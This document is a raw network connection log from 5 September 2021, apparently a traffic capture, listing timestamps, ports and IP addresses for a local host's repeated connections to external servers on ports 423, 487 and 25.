Sep 5, 2021 15:50:39.127387047 CEST	423	50016	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:39.132078886 CEST	50015	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:39.132399082 CEST	50014	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:39.132623911 CEST	50016	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:39.145607948 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:39.145705938 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:39.157469988 CEST	423	50015	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:39.164000034 CEST	423	50016	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:39.168935061 CEST	423	50012	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:39.173111916 CEST	423	50014	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:39.192926884 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.233283043 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.250572920 CEST	50012	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:39.304481030 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.321301937 CEST	423	50012	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:39.334191084 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.338093996 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.338191032 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.409351110 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.409380913 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.483187914 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.483453989 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483540058 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483604908 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483647108 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483777046 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483829975 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483891010 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.483946085 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.540683985 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:39.555306911 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.555969954 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.557826042 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:39.557926893 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:39.580463886 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:39.589128971 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.589201927 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.589277029 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.589488983 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.660461903 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.696069002 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:39.758614063 CEST	50010	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:39.758640051 CEST	50011	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:39.759378910 CEST	50018	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:39.773724079 CEST	50019	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:39.828757048 CEST	423	50010	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:39.828901052 CEST	50010	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:39.830079079 CEST	423	50018	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:39.830164909 CEST	50018	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:39.837058067 CEST	423	50011	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:39.837141037 CEST	50011	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:39.844640017 CEST	423	50019	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:39.844866991 CEST	50019	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:39.861433029 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:39.900060892 CEST	423	50018	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:39.916925907 CEST	423	50019	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:39.942342043 CEST	50018	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:39.943016052 CEST	50019	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:39.945811033 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:39.977483988 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:40.012403011 CEST	423	50018	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:40.013899088 CEST	423	50019	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:40.044713020 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:40.055537939 CEST	50012	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:40.055555105 CEST	50014	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.055567980 CEST	50016	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.055588961 CEST	50015	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.061253071 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.067897081 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:40.067929983 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:40.080925941 CEST	423	50015	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.081021070 CEST	50015	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.087234020 CEST	423	50016	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.087315083 CEST	50016	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.096610069 CEST	423	50014	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.096694946 CEST	50014	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.119235039 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:40.123270988 CEST	50020	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:40.125509977 CEST	423	50012	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:40.125633001 CEST	50012	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:40.127410889 CEST	50021	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.128002882 CEST	50022	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.128604889 CEST	50023	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.153314114 CEST	423	50022	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.153398037 CEST	50022	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.162058115 CEST	423	50023	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.162131071 CEST	50023	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.169843912 CEST	423	50021	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.169894934 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.169931889 CEST	50021	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.178891897 CEST	423	50022	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.179187059 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:40.179363966 CEST	50022	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.188280106 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:40.192411900 CEST	423	50020	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:40.192543030 CEST	50020	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:40.193927050 CEST	423	50023	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.194200039 CEST	50023	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.195727110 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.204432011 CEST	423	50022	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.210762024 CEST	423	50021	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.211061954 CEST	50021	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.226413965 CEST	423	50023	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.244663954 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:40.254944086 CEST	423	50021	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.261852980 CEST	423	50020	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:40.262053967 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:40.262079954 CEST	50020	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:40.300168991 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.306183100 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.325972080 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:40.331607103 CEST	423	50020	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:40.338371992 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:40.338464022 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:40.370158911 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.370301962 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.384280920 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.384301901 CEST	25	49914	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:40.385631084 CEST	49914	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:40.414880037 CEST	50018	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:40.414948940 CEST	50019	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:40.422512054 CEST	50026	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:40.423137903 CEST	50027	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:40.450854063 CEST	25	50017	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:40.450936079 CEST	50017	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:40.474843025 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.486819983 CEST	423	50018	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:40.486918926 CEST	50018	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:40.488521099 CEST	423	50019	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:40.488591909 CEST	50019	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:40.500443935 CEST	423	50026	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:40.500533104 CEST	50026	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:40.502768040 CEST	423	50027	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:40.502932072 CEST	50027	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:40.523888111 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:40.534624100 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.575793028 CEST	423	50026	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:40.581796885 CEST	423	50027	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:40.603733063 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.620227098 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:40.620382071 CEST	50026	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:40.620547056 CEST	50027	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:40.650249004 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.695303917 CEST	423	50026	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:40.695400000 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.695502043 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.699763060 CEST	423	50027	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:40.764910936 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.764935017 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.764944077 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.769752979 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:40.769778967 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:40.777971029 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:40.822319031 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.822549105 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822670937 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822714090 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822801113 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822849035 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822911978 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822945118 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.822989941 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.823050976 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.836905956 CEST	50021	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.836913109 CEST	50022	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.837574005 CEST	50023	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.837596893 CEST	50028	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.838648081 CEST	50030	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.838649988 CEST	50029	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.862256050 CEST	423	50022	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.862360954 CEST	50022	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.863359928 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:40.864487886 CEST	423	50029	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.864588976 CEST	50029	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.869149923 CEST	423	50023	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.869249105 CEST	50023	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.870567083 CEST	423	50030	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.870683908 CEST	50030	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.877512932 CEST	423	50021	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.877621889 CEST	50021	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.878221989 CEST	423	50028	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.878321886 CEST	50028	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.890630007 CEST	423	50029	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.890827894 CEST	50029	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:40.892256975 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892273903 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892280102 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892288923 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892296076 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892307043 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892313957 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892323971 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.892329931 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.902194023 CEST	423	50030	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.902429104 CEST	50030	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:40.917793036 CEST	423	50029	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:40.920336008 CEST	423	50028	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.920566082 CEST	50028	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:40.926234007 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:40.928339005 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.928622961 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:40.928718090 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.932800055 CEST	50025	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:40.935571909 CEST	423	50030	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:40.961445093 CEST	423	50028	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:40.993129015 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:41.002382994 CEST	487	50025	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:41.102504969 CEST	50020	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.102986097 CEST	50032	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.107391119 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:41.158384085 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:41.158514023 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:41.171689987 CEST	423	50020	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.171773911 CEST	50020	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.174566984 CEST	423	50032	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.174674034 CEST	50032	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.246686935 CEST	423	50032	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.249150991 CEST	50032	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.295310020 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.318995953 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.321048975 CEST	423	50032	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.368119955 CEST	50026	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.368155003 CEST	50027	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.383745909 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:41.441777945 CEST	423	50026	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:41.441857100 CEST	50026	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.448168993 CEST	423	50027	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:41.448240042 CEST	50027	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.455717087 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:41.474775076 CEST	50033	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.495310068 CEST	50034	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.505598068 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:41.512190104 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:41.540288925 CEST	50028	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:41.540323019 CEST	50029	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:41.540359974 CEST	50030	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:41.544554949 CEST	423	50033	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:41.544670105 CEST	50033	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.564652920 CEST	423	50034	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:41.564762115 CEST	50034	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.566498041 CEST	423	50029	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:41.566562891 CEST	50029	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:41.572778940 CEST	423	50030	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:41.572864056 CEST	50030	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:41.582289934 CEST	423	50028	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:41.582360029 CEST	50028	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:41.618539095 CEST	423	50033	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:41.633934021 CEST	423	50034	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:41.660255909 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.666074038 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.681099892 CEST	50035	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:41.681365967 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:41.682113886 CEST	50037	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:41.682948112 CEST	50038	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:41.683238983 CEST	50033	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.683514118 CEST	50034	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.696283102 CEST	50032	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.709825993 CEST	423	50037	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:41.709922075 CEST	50037	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:41.716989040 CEST	423	50038	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:41.717108965 CEST	50038	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:41.723951101 CEST	423	50035	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:41.724035978 CEST	50035	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:41.734970093 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:41.734994888 CEST	423	50037	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:41.735085964 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:41.744918108 CEST	50039	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.745287895 CEST	50037	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:41.750999928 CEST	423	50038	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:41.751019001 CEST	423	50034	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:41.751187086 CEST	50038	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:41.751280069 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:41.754045010 CEST	423	50033	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:41.765163898 CEST	423	50035	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:41.765378952 CEST	50035	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:41.770195007 CEST	423	50032	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.770216942 CEST	423	50037	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:41.770315886 CEST	50032	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.785324097 CEST	423	50038	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:41.793157101 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:41.802781105 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:41.802800894 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:41.806096077 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:41.811424017 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:41.812084913 CEST	423	50035	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:41.815776110 CEST	423	50039	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.815915108 CEST	50039	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.853769064 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:41.859256029 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:41.862716913 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:41.871191025 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:41.873900890 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:41.884982109 CEST	423	50039	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:41.899599075 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.899633884 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.899647951 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.899660110 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.899671078 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:41.901695967 CEST	25	49913	13.94.144.32	192.168.2.4
Sep 5, 2021 15:50:41.901827097 CEST	49913	25	192.168.2.4	13.94.144.32
Sep 5, 2021 15:50:41.925712109 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:41.991995096 CEST	50039	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:41.992311001 CEST	50033	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.992317915 CEST	50034	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:41.993700981 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:41.994154930 CEST	50041	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:41.994734049 CEST	50042	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:42.003961086 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:42.041428089 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.060251951 CEST	423	50034	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:42.060343027 CEST	50034	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:42.061072111 CEST	423	50039	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:42.061305046 CEST	423	50042	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:42.061403036 CEST	50042	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:42.062875986 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.062890053 CEST	423	50033	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:42.066056967 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.066169977 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.066171885 CEST	50033	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:42.067804098 CEST	423	50041	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:42.067907095 CEST	50041	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:42.107799053 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:42.120718002 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:42.128916025 CEST	423	50042	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:42.129110098 CEST	50042	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:42.141727924 CEST	423	50041	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:42.141968012 CEST	50041	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:42.153237104 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.153354883 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.195724964 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.196140051 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.196227074 CEST	423	50042	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:42.216048002 CEST	423	50041	193.56.146.42	192.168.2.4
